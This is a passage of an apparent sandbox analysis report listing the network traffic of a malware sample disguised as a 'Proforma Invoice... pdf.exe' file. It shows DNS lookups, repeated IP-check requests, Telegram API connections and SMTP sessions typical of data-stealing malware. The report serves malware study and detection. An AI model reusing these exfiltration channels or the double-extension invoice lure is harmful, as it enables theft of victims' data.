                                                                                          Oct 17, 2024 09:44:50.201055050 CEST8049774193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.201148987 CEST4977480192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.204370022 CEST4977480192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.206306934 CEST8049774193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.206434965 CEST4977480192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.206434965 CEST4977480192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.207030058 CEST4977580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.209170103 CEST8049774193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.211301088 CEST8049774193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.211339951 CEST8049774193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.211937904 CEST8049775193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.212021112 CEST4977580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.212238073 CEST4977580192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.217242002 CEST8049775193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.217695951 CEST8049775193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.220786095 CEST4977680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.225624084 CEST8049776193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.225743055 CEST4977680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.227319002 CEST4977680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:50.232095003 CEST8049776193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.910689116 CEST8049776193.122.130.0192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.911880016 CEST49777443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:50.911911964 CEST44349777188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.911995888 CEST49777443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:50.912270069 CEST49777443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:50.912282944 CEST44349777188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:50.953371048 CEST4977680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:51.526719093 CEST44349777188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.528593063 CEST49777443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:51.528615952 CEST44349777188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.672851086 CEST44349777188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.672939062 CEST44349777188.114.96.3192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.673083067 CEST49777443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:51.705965042 CEST49777443192.168.2.4188.114.96.3
                                                                                          Oct 17, 2024 09:44:51.727929115 CEST49779443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:51.727957010 CEST44349779149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.728029013 CEST49779443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:51.728446007 CEST49779443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:51.728457928 CEST44349779149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.740951061 CEST44349779149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.742844105 CEST49781443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:51.742872000 CEST44349781149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.744410038 CEST49781443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:51.744779110 CEST49781443192.168.2.4149.154.167.220
                                                                                          Oct 17, 2024 09:44:51.744795084 CEST44349781149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:51.756124973 CEST44349781149.154.167.220192.168.2.4
                                                                                          Oct 17, 2024 09:44:52.673378944 CEST49787587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:52.678296089 CEST58749787208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:52.678396940 CEST49787587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:52.683442116 CEST58749787208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:52.683506966 CEST49787587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:52.684135914 CEST49787587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:52.688925982 CEST58749787208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:57.171356916 CEST4977680192.168.2.4193.122.130.0
                                                                                          Oct 17, 2024 09:44:57.298821926 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:57.303822041 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:57.304054976 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:57.923410892 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:57.923710108 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:57.928565025 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.081408024 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.093862057 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.098824024 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.253971100 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.283565044 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.288434982 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.445933104 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.449783087 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.454684973 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.628186941 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.628372908 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.633327007 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.818130016 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.818481922 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.823318958 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.976402044 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.977251053 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.977329016 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.977360964 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.977381945 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:44:58.982147932 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.982227087 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.982289076 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:58.982297897 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:59.270536900 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:44:59.312854052 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:46:37.329365969 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:46:37.334398985 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:46:37.494847059 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:46:37.495034933 CEST49790587192.168.2.4208.91.199.223
                                                                                          Oct 17, 2024 09:46:37.500407934 CEST58749790208.91.199.223192.168.2.4
                                                                                          Oct 17, 2024 09:46:37.500492096 CEST49790587192.168.2.4208.91.199.223

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 17, 2024 09:44:41.245417118 CEST5584953192.168.2.41.1.1.1
                                                                                          Oct 17, 2024 09:44:41.252358913 CEST53558491.1.1.1192.168.2.4
                                                                                          Oct 17, 2024 09:44:42.158745050 CEST6118153192.168.2.41.1.1.1
                                                                                          Oct 17, 2024 09:44:42.167570114 CEST53611811.1.1.1192.168.2.4
                                                                                          Oct 17, 2024 09:44:46.016482115 CEST6232653192.168.2.41.1.1.1
                                                                                          Oct 17, 2024 09:44:46.023715973 CEST53623261.1.1.1192.168.2.4
                                                                                          Oct 17, 2024 09:44:52.663407087 CEST5512053192.168.2.41.1.1.1
                                                                                          Oct 17, 2024 09:44:52.672741890 CEST53551201.1.1.1192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Oct 17, 2024 09:44:41.245417118 CEST192.168.2.41.1.1.10x4431Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:42.158745050 CEST192.168.2.41.1.1.10xae24Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:46.016482115 CEST192.168.2.41.1.1.10xa764Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:52.663407087 CEST192.168.2.41.1.1.10x2f29Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Oct 17, 2024 09:44:41.252358913 CEST1.1.1.1192.168.2.40x4431No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:41.252358913 CEST1.1.1.1192.168.2.40x4431No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:41.252358913 CEST1.1.1.1192.168.2.40x4431No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:41.252358913 CEST1.1.1.1192.168.2.40x4431No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:41.252358913 CEST1.1.1.1192.168.2.40x4431No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:41.252358913 CEST1.1.1.1192.168.2.40x4431No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:42.167570114 CEST1.1.1.1192.168.2.40xae24No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:42.167570114 CEST1.1.1.1192.168.2.40xae24No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:46.023715973 CEST1.1.1.1192.168.2.40xa764No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:52.672741890 CEST1.1.1.1192.168.2.40x2f29No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:52.672741890 CEST1.1.1.1192.168.2.40x2f29No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:52.672741890 CEST1.1.1.1192.168.2.40x2f29No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                          Oct 17, 2024 09:44:52.672741890 CEST1.1.1.1192.168.2.40x2f29No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • reallyfreegeoip.org
                                                                                          • api.telegram.org
                                                                                          • checkip.dyndns.org

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.449739193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:41.263462067 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 17, 2024 09:44:41.933653116 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:41 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 38b006c39d5512eb69f0ac3932616c22
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>
                                                                                          Oct 17, 2024 09:44:41.942300081 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 17, 2024 09:44:42.101335049 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:42 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 8c43f581943b77e6a3d561245f532266
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>
                                                                                          Oct 17, 2024 09:44:43.259685993 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 17, 2024 09:44:43.421777010 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:43 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: c8bb8744e2f5060c62b7cb6f09fb3a38
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>
                                                                                          Oct 17, 2024 09:44:43.473447084 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 17, 2024 09:44:43.640470028 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:43 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: ff6018d67775a1664bacc155a7456193
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.449746193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:44.406837940 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.449747193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:44.416907072 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.449748193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:44.436109066 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 17, 2024 09:44:45.108935118 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:45 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 33bdca9a3db699e28f835ff01c0ff78f
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.449750193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.185509920 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 17, 2024 09:44:45.848067045 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:45 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: c56dbc6c11efa85fda36136bf6f527a3
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>
                                                                                          Oct 17, 2024 09:44:45.853065014 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 17, 2024 09:44:46.012114048 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:45 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 8bde08fc7223ffea66362eb7b955c840
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>
                                                                                          Oct 17, 2024 09:44:46.939168930 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 17, 2024 09:44:47.101924896 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:47 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 8a7d2221aa4a6601b0c5769df1f25615
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.449751193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.885001898 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.449752193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.896285057 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.449753193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.913324118 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.449754193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.923994064 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.449755193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.941097021 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.449756193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.952192068 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.449757193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.967854023 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.449758193.122.130.0808080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:45.981415987 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.449762193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:47.900388002 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 17, 2024 09:44:48.560842991 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:48 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: 50d51d800bf73f8e517fd2290e986ab2
